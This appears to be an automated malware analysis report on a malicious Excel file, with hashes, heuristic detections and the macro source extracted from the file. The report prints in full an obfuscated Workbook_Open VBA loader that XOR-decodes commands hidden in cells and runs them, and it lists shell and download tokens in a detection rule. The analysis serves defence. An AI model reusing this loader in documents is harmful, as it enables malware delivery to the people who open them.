Office (OLE) / .XLS malware analysis — malicious · ba86a09b8aabe54d

MALICIOUS

Office (OLE) / .XLS

49.0 KB Created: 2023-04-16 23:00:14 Authoring application: Microsoft Excel First seen: 2023-04-19

MD5: 0eca0fa95c98cc64f9abd01e89909ddd SHA-1: ea9707fb215ff5d7a31d6c5d32eedef86124758d SHA-256: ba86a09b8aabe54dc7dee3247935d051cd4db9422bb9840157d86cde87291b83

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Excel file containing VBA macros. The Workbook_Open macro triggers the execution of the GatherinG subroutine, which uses GetObject and CreateObject to instantiate an object. This object is then used to run a command, likely downloading and executing a second-stage payload. The specific command and payload are obfuscated but the intent is clear.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Strictly = GetObject(Melissa).CreateObject(Similarly)
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Strictly = GetObject(Melissa).CreateObject(Similarly)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4811 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4811 bytes
SHA-256: `87e4996b9f7c2379158ac7277c08c8e1f2e01c6119c3b69c88a122f320011698`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private CiviC As String Private PhotograPh As String Private Fisher As String Private Mills As String Private Strictly As Object Private Sub GatherinG() Dim Melissa As String, Profits As String, AnAlyses As String, Similarly As String GoTo Profits Meters: Melissa = RestoRe(CiviC): Profits = RestoRe(PhotograPh): AnAlyses = RestoRe(Fisher): Similarly = RestoRe(Mills) Set Strictly = GetObject(Melissa).CreateObject(Similarly) GoTo Overnight Profits: CiviC = Sheets("tcb5").Range("E167").Value: PhotograPh = Sheets("tcb5").Range("J100").Value: Fisher = Sheets("tcb5").Range("J103").Value: Mills = Sheets("tcb5").Range("F183").Value GoTo Meters Overnight: Strictly.Run AnAlyses & " " & Profits, 0 End Sub Sub Workbook_Open() GoTo Florist Dim Gates As String Gates = InputBox("enter the first number") Dim SectorS As String SectorS = InputBox("enter the last number") MsgBox Gates MsgBox SectorS Florist: If Gates = "" Then GatherinG End If End Sub Private Function Parenting(ByVal Threshold As String) As Variant Dim Walter() As Byte, i As Long, TesTimony As Integer i = 0: ReDim Walter(0 To (Len(Threshold) / 2)) As Byte Gates: If i < Len(Threshold) Then TesTimony = TesTimony + 1 Walter(TesTimony - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Threshold, i + 1, 2) i = i + 2 GoTo Gates Else GoTo SectorS End If SectorS: Parenting = Walter End Function Private Function RestoRe(ByVal AdvAntAges As String) As Variant Dim Districts As Long: Districts = 0: Dim Justin() As Byte: Dim Packs() As Byte, Walter As String, TesTimony As Integer Packs = "y771c6447f" GoTo Twelve Danger: Dim SectorS As String SectorS = InputBox("put calc number") MsgBox SectorS SuperviSor: If Districts < UBound(Justin) Then TesTimony = Districts Mod (10) GoTo Melissa Profits: Walter = Walter & Chr(Justin(Districts)) Districts = Districts + 1 GoTo SuperviSor Else GoTo Xhtml End If Threshold: MsgBox "err -52525" Dim Gates As String Gates = InputBox("") MsgBox Gates Xhtml: RestoRe = Walter Exit Function Twelve: Justin = Parenting(AdvAntAges) GoTo SuperviSor Melissa: Justin(Districts) = Abs(Justin(Districts) Xor Packs(TesTimony * 2)) GoTo Profits End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 87e4996b9f7c2379158ac7277c08c8e1f2e01c6119c3b69c88a122f320011698

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private CiviC As String






                                                        Private PhotograPh As String
Private Fisher As String





            Private Mills As String






              Private Strictly As Object









             Private Sub GatherinG()







             Dim Melissa As String, Profits As String, AnAlyses As String, Similarly As String







                                        







               GoTo Profits
Meters:
Melissa = RestoRe(CiviC): Profits = RestoRe(PhotograPh): AnAlyses = RestoRe(Fisher): Similarly = RestoRe(Mills)
Set Strictly = GetObject(Melissa).CreateObject(Similarly)
GoTo Overnight
Profits:
CiviC = Sheets("tcb5").Range("E167").Value: PhotograPh = Sheets("tcb5").Range("J100").Value: Fisher = Sheets("tcb5").Range("J103").Value: Mills = Sheets("tcb5").Range("F183").Value






                                                                GoTo Meters
Overnight:
Strictly.Run AnAlyses & " " & Profits, 0
End Sub
Sub Workbook_Open()
GoTo Florist








                   Dim Gates As String
Gates = InputBox("enter the first number")








                  Dim SectorS As String
SectorS = InputBox("enter the last number")
MsgBox Gates







                                                                    MsgBox SectorS
Florist:





                 If Gates = "" Then
GatherinG





                                                            End If





                                                                    End Sub
Private Function Parenting(ByVal Threshold As String) As Variant






                 







                                            Dim Walter() As Byte, i As Long, TesTimony As Integer






          i = 0: ReDim Walter(0 To (Len(Threshold) / 2)) As Byte
Gates:






                                                                            If i < Len(Threshold) Then
TesTimony = TesTimony + 1








                                                                    Walter(TesTimony - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Threshold, i + 1, 2)
i = i + 2
GoTo Gates





                                                                Else
GoTo SectorS






                                                            







                                                                            End If
SectorS:





              Parenting = Walter








                                                        End Function





           Private Function RestoRe(ByVal AdvAntAges As String) As Variant





                                                            Dim Districts As Long: Districts = 0: Dim Justin() As Byte: Dim Packs() As Byte, Walter As String, TesTimony As Integer
Packs = "y771c6447f"
GoTo Twelve
Danger:








                                                                        Dim SectorS As String







               SectorS = InputBox("put calc number")
MsgBox SectorS





SuperviSor:
If Districts < UBound(Justin) Then
TesTimony = Districts Mod (10)





           





                                                                        







                   GoTo Melissa
Profits:
Walter = Walter & Chr(Justin(Districts))
Districts = Districts + 1
GoTo SuperviSor





                                                                





                                                        Else
GoTo Xhtml
End If
Threshold:






             MsgBox "err -52525"
Dim Gates As String
Gates = InputBox("")





                   MsgBox Gates
Xhtml:






              RestoRe = Walter
Exit Function






Twelve:
Justin = Parenting(AdvAntAges)








                                                GoTo SuperviSor
Melissa:
Justin(Districts) = Abs(Justin(Districts) Xor Packs(TesTimony * 2))








           GoTo Profits
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.